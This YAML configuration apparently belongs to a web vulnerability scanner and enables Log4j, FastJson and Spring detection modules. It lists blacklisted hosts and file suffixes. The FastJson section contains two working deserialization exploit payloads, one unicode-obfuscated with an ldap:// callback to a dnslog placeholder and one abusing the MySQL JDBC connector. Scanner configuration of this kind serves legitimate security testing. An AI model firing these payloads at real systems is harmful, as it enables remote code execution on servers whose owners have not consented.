isStart: true
scan:
  # 注意暂不支持正则表达式
  blacklist:
    - ".dnslog.cn"
    - ".ceye.io"
    - ".fofa.so"
    - ".shodan.io"
    - ".github.com"
    - ".baidu.com"
    - ".google.com"
    - "wappalyzer.com"
    - "firefox.com"
    - "chaitin.net"
    - ".mozilla."
    - ".bilibili.com"
    - "github.com"
    - ".csdn"
  urlBlackListSuffix:
    - "3g2"
    - "3gp"
    - "7z"
    - "aac"
    - "abw"
    - "aif"
    - "aifc"
    - "aiff"
    - "arc"
    - "au"
    - "avi"
    - "azw"
    - "bin"
    - "bmp"
    - "3g2"
    - "3gp"
    - "7z"
    - "aac"
    - "abw"
    - "aif"
    - "aifc"
    - "aiff"
    - "arc"
    - "au"
    - "avi"
    - "azw"
    - "bin"
    - "bmp"
    - "bz"
    - "bz2"
    - "cmx"
    - "cod"
    - "csh"
    - "css"
    - "csv"
    - "doc"
    - "docx"
    - "eot"
    - "epub"
    - "gif"
    - "gz"
    - "ico"
    - "ics"
    - "ief"
    - "jar"
    - "jfif"
    - "jpe"
    - "jpeg"
    - "jpg"
    - "m3u"
    - "mid"
    - "midi"
    - "mjs"
    - "mp2"
    - "mp3"
    - "mpa"
    - "mpe"
    - "mpeg"
    - "mpg"
    - "mpkg"
    - "mpp"
    - "mpv2"
    - "odp"
    - "ods"
    - "odt"
    - "oga"
    - "ogv"
    - "ogx"
    - "otf"
    - "pbm"
    - "pdf"
    - "pgm"
    - "png"
    - "pnm"
    - "ppm"
    - "ppt"
    - "pptx"
    - "ra"
    - "ram"
    - "rar"
    - "ras"
    - "rgb"
    - "rmi"
    - "rtf"
    - "snd"
    - "svg"
    - "swf"
    - "tar"
    - "tif"
    - "tiff"
    - "ttf"
    - "vsd"
    - "wav"
    - "weba"
    - "webm"
    - "webp"
    - "woff"
    - "woff2"
    - "xbm"
    - "xls"
    - "xlsx"
    - "xpm"
    - "xul"
    - "xwd"
    - "zip"
    - "js"
    - "wmv"
    - "asf"
    - "asx"
    - "rm"
    - "rmvb"
    - "mp4"
    - "mov"
    - "m4v"
    - "dat"
    - "mkv"
    - "flv"
    - "vob"
    - "txt"
    - "php"
    - "asp"
  blackFeatures:
    - "ASP.NET"
    - "PHP/"
    - "AspNet"
    - "Microsoft-IIS"
    - "ThinkPHP"
scanModule:
  Log4jScan:
    isStart: true
    ScanHeader:
      - "Accept"
      - "User-Agent"
      - "Origin"
      - "Referer"
      - "X-Api-Version"
  FastJsonScan:
    isStart: true
    payload:
      - "{\"name\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u006a\\u0061\\u0076\\u0061\\u002e\\u006c\\u0061\\u006e\\u0067\\u002e\\u0043\\u006c\\u0061\\u0073\\u0073\",\"\\u0076\\u0061\\u006c\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\"},\"x\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\",\"\\u0064\\u0061\\u0074\\u0061\\u0053\\u006f\\u0075\\u0072\\u0063\\u0065\\u004e\\u0061\\u006d\\u0065\":\"ldap://dnslog-url/hello\",\"autoCommit\":true}}"
      - "{\"x\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"com.mysql.jdbc.JDBC4Connection\",\"hostToConnectTo\":\"dnslog-url\",\"portToConnectTo\":80,\"info\":{\"user\":\"root\",\"password\":\"ubuntu\",\"useSSL\":\"false\",\"statementInterceptors\":\"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\",\"autoDeserialize\":\"true\"},\"databaseToConnectTo\":\"mysql\",\"url\":\"\"}}"
  SpringSpiderScan:
    isStart: true
dnsLog:
  domain: ""
  token: ""
